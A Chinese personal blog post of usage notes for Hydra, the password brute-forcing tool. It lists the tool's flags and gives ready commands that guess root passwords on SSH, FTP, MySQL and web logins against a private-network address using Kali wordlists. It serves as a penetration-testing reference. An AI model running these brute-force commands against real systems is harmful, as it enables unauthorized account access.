Bu1'Blog

如果能控制粗鄙的狂喜,就不会有深入骨髓的悲伤。

0%

Hydra使用笔记

今天又碰到了需要使用到hydra的场景,为了加深自己对使用命令的印象,同时也是为了今后再忘记时可以快速索引到自己所需要的知识点写下了今天这篇博客。

所用到的知识均来自网络。


Hydra简介

hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可。

支持的常用服务:POP3,SMB,RDP,SSH,FTP,POP3,Telnet,MYSQL…

Hydta使用参数

-h 帮助文档baop

-R 继续上一次进度破解

-S 采用SSL连接

-s PORT 指定非默认端口

-e ns可选选项,n:空密码探测,s:指定用户密码探测

-l LOGIN 指定要破解的用户

-L FILE 指定用户名字典破解

-p FILE 指定单密码

-P FILE 指定要使用的密码字典破解

-C FILE 使用冒号分割的格式,如“login:pass”来替代-L/-P参数

-t TASKS 同时运行的线程数量,默认16线程

-M 指定多目标(文件内格式为地址:端口)

-w TIME 设置最大超时时间,单位秒。默认30s

-v/-V 显示爆破详细信息

-f 如果爆破成功则停止爆破

Hydta实战用法

  • 爆破SSH服务
1
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f ssh://192.168.0.110
1
hydra 192.168.0.110 ssh -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f

攻击目标:192.168.0.110

使用的模块:ssh

爆破的用户名:root(-l)

爆破的密码字典:/usr/share/wordlists/metasploit/unix_passwords.txt(*kali自带字典目 录:/usr/share/wordlists/metasploit/*)(-P)

爆破的线程数:11(-t)

显示详细信息:(-v)

爆破成功一个后停止(-f)

  • 爆破FTP服务
1
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f ftp://192.168.0.110
1
hydra 192.168.0.110 ftp -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f

攻击目标:192.168.0.110

使用的模块:ftp

其余同上

  • 爆破Mysql
1
hydra -L username.txt -P password.txt mysql://192.168.0.110:mysql端口号
  • 破解web登录
1
get方式:hydra -l 用户名 -p 密码字典 -t 线程 -vV IP http-get /login.php